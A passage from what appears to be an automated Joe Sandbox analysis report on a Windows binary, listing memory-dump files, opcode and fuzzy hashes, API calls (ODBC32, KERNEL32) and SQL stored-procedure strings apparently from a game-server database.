                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: af1dd99e4f9071043df46c4b32b51454f0699c1a8ab68053e70f97e9ad9ca887
                                                                                      • Instruction ID: cf2c24e1d65800a880274d26670f84e8c83120806315b76d92f1d5ce941c9fac
                                                                                      • Opcode Fuzzy Hash: af1dd99e4f9071043df46c4b32b51454f0699c1a8ab68053e70f97e9ad9ca887
                                                                                      • Instruction Fuzzy Hash: 9141EDB1A40558ABDB24DB09CD51FEE7375EF44704F10818AFE186B382D675AF908F54
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044A5CF
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044A5FF
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044A62F
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?), ref: 0044A65F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?), ref: 0044A68F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F1,?), ref: 0044A6BF
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000029,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044A6EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c2a0f8d7b84fb2989841d90031fb60af17d2917b8f39b0948e4b58b7ab8fbad7
                                                                                      • Instruction ID: 3a892ed7a23c088e00ed9fc1def5095df269fd3c290d821a2561a4d694028ee4
                                                                                      • Opcode Fuzzy Hash: c2a0f8d7b84fb2989841d90031fb60af17d2917b8f39b0948e4b58b7ab8fbad7
                                                                                      • Instruction Fuzzy Hash: DB411E71A01118BBDB64CB99DC55FAA7335EB48728F208288F6186B3D1DA75ED808F58
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044C7AD
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044C7DD
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044C80D
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000E7,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044C83D
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000E7,?), ref: 0044C86D
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044C89D
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F1,?), ref: 0044C8CD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ca19370a99fcc8b79befe27ae37131c025b91bd49294c52298a7a8170495e8d
                                                                                      • Instruction ID: 5dae9cc398a107faaf29c5d38da6704e10023a2910290d2cb0c91967c66e0316
                                                                                      • Opcode Fuzzy Hash: 9ca19370a99fcc8b79befe27ae37131c025b91bd49294c52298a7a8170495e8d
                                                                                      • Instruction Fuzzy Hash: 9B41EDB1A00158ABDB64DB09CC59FAA7375EB44718F2083CAF6197B3D1DA71AD80CF54
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 00447A9B
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 00447ACB
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000E7,?,00000000,00000000,?,00000000,000000F0,?), ref: 00447AFB
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000E7,?), ref: 00447B2B
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F1,?), ref: 00447B5B
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000E7,?,00000000,00000000,?,00000000,000000F0,?), ref: 00447B8B
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000E7,?), ref: 00447BBB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 000cbbbe72567b516380c1ec00272958dc4613e6e6ef17178f7241862a040819
                                                                                      • Instruction ID: 8a9b62c7d453b35fe3504be4cd35f9f0199a72f8f41645cae0334b4f3416973e
                                                                                      • Opcode Fuzzy Hash: 000cbbbe72567b516380c1ec00272958dc4613e6e6ef17178f7241862a040819
                                                                                      • Instruction Fuzzy Hash: C541D9B1E00228ABDB24DF09CD51FEB7379EB84718F108288F6196A381D672AD90CB54
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,004BA2B4,?,00000000,?,?,?,?,004B8CF6,004B878D,004A2D43), ref: 004BA04B
                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,004BA2B4,?,00000000,?,?,?,?,004B8CF6,004B878D,004A2D43,00412E13), ref: 004BA069
                                                                                      • LocalAlloc.KERNEL32(00000000,?,00000010,?,?,?,?,004BA2B4,?,00000000,?,?,?,?,004B8CF6,004B878D), ref: 004BA0C5
                                                                                      • LocalReAlloc.KERNEL32(?,?,00000002,00000010,?,?,?,?,004BA2B4,?,00000000,?,?,?,?,004B8CF6), ref: 004BA0D7
                                                                                      • LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,004BA2B4,?,00000000,?,?,?,?,004B8CF6,004B878D,004A2D43,00412E13), ref: 004BA0E4
                                                                                      • TlsSetValue.KERNEL32(?,00000000,004A2D43,00412E13,00000000), ref: 004BA114
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,004BA2B4,?,00000000,?,?,?,?,004B8CF6,004B878D,004A2D43,00412E13), ref: 004BA135
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                                      • String ID:
                                                                                      • API String ID: 784703316-0
                                                                                      • Opcode ID: 62b0c3de76e0c949c7e86858076af5ebc183ba065aa93d4b20bc2492c59e6847
                                                                                      • Instruction ID: 78208e80d11eea3c4e62f469a1dbc4c0846e8f662cde8e17d1a1bca2d02d2675
                                                                                      • Opcode Fuzzy Hash: 62b0c3de76e0c949c7e86858076af5ebc183ba065aa93d4b20bc2492c59e6847
                                                                                      • Instruction Fuzzy Hash: 1731AC75600605AFCB24AF59C884CAAB7F9FF44354B10852EE956D3621C738ED60CBAA
                                                                                      APIs
                                                                                      • #19.ODBC32(?, { ? = CALL [ROHAN_AddHonorCrone] (?, ?, ?)},000000FD), ref: 0043FAA0
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043FAE2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043FB17
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043FB4F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043FB87
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_AddHonorCrone] (?, ?, ?)}, xrefs: 0043FA97
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_AddHonorCrone] (?, ?, ?)}
                                                                                      • API String ID: 0-1073649337
                                                                                      • Opcode ID: 20ce0c0c5c5edb042647dd3ecacef58e530fe85875bf05d935b12e91fcc8ce49
                                                                                      • Instruction ID: ac42b0b11d73838fd2a02335caafb0b3953ef68f6c56e0a532f692b45393059f
                                                                                      • Opcode Fuzzy Hash: 20ce0c0c5c5edb042647dd3ecacef58e530fe85875bf05d935b12e91fcc8ce49
                                                                                      • Instruction Fuzzy Hash: EA31F0B46812157BEB24DF04CC52FD97374EB84715F1083C8F628AE2C5D6B5A9608F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_DelCharMission] (?, ?, ?)},000000FD), ref: 004420D0
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0044210F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00442144
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0044217C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004421B4
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_DelCharMission] (?, ?, ?)}, xrefs: 004420C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_DelCharMission] (?, ?, ?)}
                                                                                      • API String ID: 0-2751184254
                                                                                      • Opcode ID: ffe34146f7950a03eeb0c7135f399785632ee469d4a43202d5951a3ae3b746db
                                                                                      • Instruction ID: 8d2d88f43799c705a559c9fc5f0fd2a4c4899f3bf3ed9cc6a0b293914d8ecef7
